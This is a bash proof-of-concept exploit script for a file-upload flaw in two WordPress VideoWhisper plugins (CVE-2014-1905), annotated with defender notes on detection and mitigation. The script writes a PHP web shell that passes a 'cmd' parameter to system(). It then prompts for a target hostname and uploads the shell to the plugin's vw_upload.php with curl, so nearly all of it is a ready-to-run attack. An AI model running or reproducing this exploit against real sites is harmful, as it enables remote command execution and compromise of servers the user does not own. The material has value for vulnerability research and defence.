#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#v1.0
#
# What this script demonstrates (per its own banner text below): the earlier
# fix for the VideoWhisper upload flaw (CVE-2014-1905, BID 53851) is described
# as incomplete, because Debian/Ubuntu php5.conf maps .pht and .phtml to the
# PHP handler, so an uploaded file with one of those extensions is still
# executed as PHP.
#
# Defender notes:
#  - Detection: multipart POST requests to the two vw_upload.php paths used
#    below (form fields vw_file, name, room), and .pht/.phtml files appearing
#    under wp-content/plugins/videowhisper-*.
#  - Mitigation: limit the PHP handler to the extensions the site really
#    needs, deny script execution in directories that accept uploads, and
#    remove or update the affected plugins.

# Write the test payload to ./shell.pht. The heredoc delimiter (-EOF-) is
# unquoted, so the backslashes before each $ stop the shell from expanding the
# PHP variables. The PHP that is written passes the "cmd" request parameter to
# system(), i.e. it is a command-execution web shell; a file of this shape on
# a server is an indicator of compromise.
cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
echo "<pre>";
\$cmd = (\$_REQUEST[‘cmd’]);
system(\$cmd);
echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-
# ANSI escape sequences used by the banner: red text, then reset.
red='\033[0;31m'
NC='\033[0m' # No Color
# `[ true ]` tests a non-empty string, so this loop repeats until the user
# interrupts it (the banner says Ctrl-C).
while [ true ]; do
# Banner: title, date, author, the stated root cause and advisory links.
echo -e ${red};
echo -e " VideoWhisper Remote File Upload PoC Redux $NC";
echo " 4/14/2015";
echo " Larry W. Cashdollar, @_larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo " - Advisories -";
echo "http://www.vapid.dhs.org/blog/04-16-2015/";
echo "http://www.vapid.dhs.org/advisory.php?v=116";
echo "http://www.vapid.dhs.org/advisory.php?v=117";
echo
echo
echo "Ctrl ^C to exit";
# Three interactive prompts: host name, plugin selector, local file to send.
# The values are used unvalidated and unquoted in the commands below.
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
# "1" selects the Video Conference Integration plugin; any other input falls
# through to the Video Presentation branch.
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
echo
# Multipart form upload over plain HTTP: vw_file carries the file content,
# name repeats the file name, room is "./" (presumably the destination
# directory as seen by vw_upload.php -- the handler is not shown here).
curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php
else
echo "[+] Targeting Video Presentation Plugin";
echo
# Same request shape as above, sent to the presentation plugin's handler.
curl --form "vw_file=@$file" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
fi;
done